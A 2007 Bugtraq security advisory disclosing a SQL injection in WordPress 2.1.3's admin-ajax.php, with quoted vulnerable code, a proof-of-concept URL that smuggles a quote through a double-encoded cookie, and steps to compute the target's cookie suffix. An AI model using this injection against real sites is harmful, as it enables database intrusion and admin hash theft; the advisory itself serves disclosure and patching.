[waraxe-2007-SA#050] - Sql Injection in WordPress 2.1.3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [waraxe-2007-SA#050] - Sql Injection in WordPress 2.1.3
From: come2waraxe@xxxxxxxxx
Date: 21 May 2007 12:20:03 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


[waraxe-2007-SA#050] - Sql Injection in WordPress 2.1.3
====================================================================

Author: Janek Vind "waraxe"
Date: 21. May 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-50.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable: WordPress 2.1.3
Patched: WordPress 2.2

http://www.wordpress.org/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. critical sql injection in "admin-ajax.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's have look @ source code of "wp-admin/admin-ajax.php" ~ line 6:

------------------[source code]----------------------
define('DOING_AJAX', true);

check_ajax_referer();
if ( !is_user_logged_in() )
        die('-1');
------------------[/source code]----------------------

Now let's take a peek at "check_ajax_referer()"

------------------[source code]----------------------
function check_ajax_referer() {
        $cookie = explode('; ', urldecode(empty($_POST['cookie']) ? 
$_GET['cookie'] : $_POST['cookie'])); // AJAX scripts must pass
 cookie=document.cookie
        foreach ( $cookie as $tasty ) {
                if ( false !== strpos($tasty, USER_COOKIE) )
                        $user = substr(strstr($tasty, '='), 1);
                if ( false !== strpos($tasty, PASS_COOKIE) )
                        $pass = substr(strstr($tasty, '='), 1);
        }
        if ( !wp_login( $user, $pass, true ) )
                die('-1');
------------------[/source code]----------------------

We can see "urldecode()" in use ...
So by using "%2527" we can deliver single quotes to "wp_login()", 
effectively bypassing php's "magic_quotes" feature!

Hmm, let's proceed further:


------------------[source code]----------------------
function wp_login($username, $password, $already_md5 = false) {
        global $wpdb, $error;
...
        $login = get_userdatabylogin($username);
------------------[/source code]----------------------


And finally:


------------------[source code]----------------------
function get_userdatabylogin($user_login) {
        global $wpdb;
...
        if ( !$user = $wpdb->get_row("SELECT * FROM $wpdb->users
 WHERE user_login = '$user_login'") )
                return false;
------------------[/source code]----------------------

So really there seems to be exist sql injection possibility.
Now it's time for some proof-of-concept fun :)

------------------[PoC test]-----------------------
http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php?
cookie=wordpressuser_5a136e6377f39b00c76957953df945db%253dx%2527gotcha
;+wordpresspass_5a136e6377f39b00c76957953df945db%253dx
------------------[/PoC test]----------------------

... and if WordPress sql error feedback is enabled, then we can see
nice error message:

WordPress database error: [You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for
the right syntax to use near 'gotcha'' at line 1]

SELECT * FROM wp_users WHERE user_login = 'x'gotcha'

Yeah, it works!! But before testing that PoC cookie suffix must be changed
to currently valid. Here is how it goes:

Example target is: http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php
Base url for WordPress installation is: http://localhost/wordpress.2.1.3
And suffix is:

md5('http://localhost/wordpress.2.1.3') = '5a136e6377f39b00c76957953df945db'

And final variable names:

wordpressuser_5a136e6377f39b00c76957953df945db
wordpresspass_5a136e6377f39b00c76957953df945db

One more time: for every target must be calculated specific suffix!

OK, now about exploiting ...

It seems that blind fishing is only method for this security hole.
There is exploit, I have written in php, which will retrieve from database
WordPress admin password md5 hash within few minutes.

Get it from here:

http://www.waraxe.us/ftopict-1776.html


//-----> See ya soon and have a nice day ;) <-----//


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

WordPress newest version 2.2 is immune against this sql injection.
So -->  http://wordpress.org/download/  <-- update it NOW!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips, Sm0ke, Chb 
and all other people who know me!

Special greets goes to Raido Kerna.

Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@xxxxxxxxx
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/


Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Axing url for easy use - http://urlaxe.com/
All about sql injections - http://sqlaxe.com/

---------------------------------- [ EOF ] ------------------------------------

Prev by Date: Oracle Forensics Part 4: Live Response
Next by Date: Remider: VNSECON 07 Call for Papers ends on June 08
Previous by thread: Oracle Forensics Part 4: Live Response
Next by thread: Remider: VNSECON 07 Call for Papers ends on June 08
Index(es):
- Date
- Thread